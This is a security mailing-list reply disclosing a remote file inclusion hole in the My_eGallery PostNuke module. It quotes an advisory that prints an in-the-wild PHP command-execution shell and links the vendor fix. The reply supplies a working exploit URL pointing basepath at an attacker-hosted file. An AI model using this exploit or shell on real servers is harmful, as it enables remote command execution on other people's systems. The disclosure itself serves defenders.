Re: Remote execution in My_eGallery

[Fauvet Ludovic <etix () runbox com>]

Hi,
There is some php scrits which are vulnerables.
One of these is displayCategory.php .
So you just have to go to:
http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[youwebsite].com
And create a directory "public" in the root of your website and put a 
file named imageFunctions.php with the code you want to inject.

--

/*-------------------
Best regards,
[::eTiX::]
(Fauvet Ludovic)
-------------------*/


Bojan Zdrnja wrote:

> Product: My_eGallery
> Versions affected: all <3.1.1.g
> Website: http://lottasophie.sourceforge.net/index.php
>
> 1. Introduction
> ---------------
>
> My_eGallery is a very nice PostNuke module, which allows users to create and
> manipulate their own galleries on the web, plus offers various additional
> features.
> For more information and a demonstration you can go to the Website above.
>
> 2. Exploit
> ----------
>
> Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
> vulnerability.
>
> Certain php files have some parameters which are used in include functions
> not filtered.
> An intruder can craft PHP code on their Web site and supply parameter to
> My_eGallery so it actually includes malicious PHP code.
>
> The following code was captured as being used in the wild (edited
> intentionally):
>
> <?
>   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
>   $output = ob_get_contents();
>   ob_end_clean();
>   print_output();
> ?>
>
> This allows execution of any command on the server with My_eGallery, under
> the privileges of the Web server (usually apache or httpd).
>
>
> 3. Solution
> -----------
>
> Vendor was contacted and promptly replied. Fix is available at the vendor's
> site:
>
> http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
> e=index&req=viewdownload&cid=5
>
> As this was seen being exploited in the wild, users are urged to upgrade to
> the latest version as soon as possible.
>
>
>
>
> Regards,
>
> Bojan Zdrnja
> CISSP

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1

mQGiBD744NQRBACSpcLYHKjo3PCDHVuJZFkzNkK9gzjCNXQnzIwpPwEI5xJd5VuX
g3+gNw0VfYx/qtIXhKW0lGAulEearMpc3SzxTB7vbz8DNU/xquxJPl4yovroJVQz
fE+r9O836yF2SvD8SgiCZfT1uBDNhU2C7z72epc5jsSYDqBMyjm/DS8t7wCg3zgF
NbwEYkx65RNBw4wpGV+o42kD/itttOB/P0Qy8/TLo8RL591PjovuCXsuy11ojS3W
Prewtx9hLO1lheqtrM+xh1fZ9P2c99KBbqVYAHLYjG/rIJGGap9TvisXYnZw2xYg
XQUpv1IB3TyUjKykTwD1L9lTl40Gy32NQLVmf4QEowXJxANVQcybe6GjoMifoY4U
bYZgA/45OW7lL6ufLVREo3WMWIxCqwPDWmyTvAk4vPKexhcSvTgBrjaUFKn8Jk0A
W0IyEM9JjTckgGVOoP5tubhEk2xVzc7dZ0D9oJvmHj92dp0Sbb+HG1uD4v2VmWWM
OoZTDvbk52LJHqfTlXZpalbmFBPg63KzIANgADdicrxxRTLE9LQtRmF1dmV0IEx1
ZG92aWMgKFs6OmVUaVg6Ol0pIDxldGl4QHJ1bmJveC5jb20+iFkEExECABkFAj74
4NQECwcDAgMVAgMDFgIBAh4BAheAAAoJEM+k/AIs6moUaN4AoKrMa/7z7ioFoMM+
ZCN7XGF5pZgpAJ9P0s2pjF2yajoQhT+PPf1WkKmY07kBzQQ++ODZEAcAvAG8v2P8
rWZAs3nFpCJxxYLyEd/HzanEhZ0o2uOQbwrQO3lfJRKwvjhkiZ4Th3bEILEShvhe
gVR4Q2KhSD/c7NUmADI945OMCwWajgPF+/voYKuChLt0gFiOYiT5aK9ElhU9BjTe
guAyMvAsxxski8ntJn+FX7KTjmwqfyRdJtvvxPh5bqqctJqkgVEeGfBPAL0aCjBh
ucZB2j8Ecadzy9SNIvYrF7S1QpBFk7+8dIz15gqd00YPJa5eoUzI/AO1FIKigZdt
mg60PLMNvU5q+TmKFhibE8ZjGOjzErlRM+8AAwUHAKuTuFGLzggST4hvDnI88yLY
q4GUvH+DlAtmhhElOz9HBgNl1sppLqzqnHhcMAaiHKYBU/OV4tNI+FlhfbV8ZQEx
EWKTtxO0sLX3zXWxghkmfxglZggejb8R5pwvP0EzBuKpthAEAHRbWdZxkrqUDw8q
IuPetoeHOCeFMYLeneZZPnPfGALSxfg3ivQMf5tn3LAvP+80dOOVdB0k5GWdWv/4
yBj+mUnhdLuRbtL2mate/jPLB8JGhklk4nntXkf9DvUUhqEYrEx1o1jYyRYFUkVy
bMiS0y3S26O/pgDz88GRiEYEGBECAAYFAj744NkACgkQz6T8AizqahQYXACgjPiE
/GBKDhTcWf1F1A+4aVIazksAoKTa1m181gR8wHDa84VbRQ5aCShe
=Sid/
-----END PGP PUBLIC KEY BLOCK-----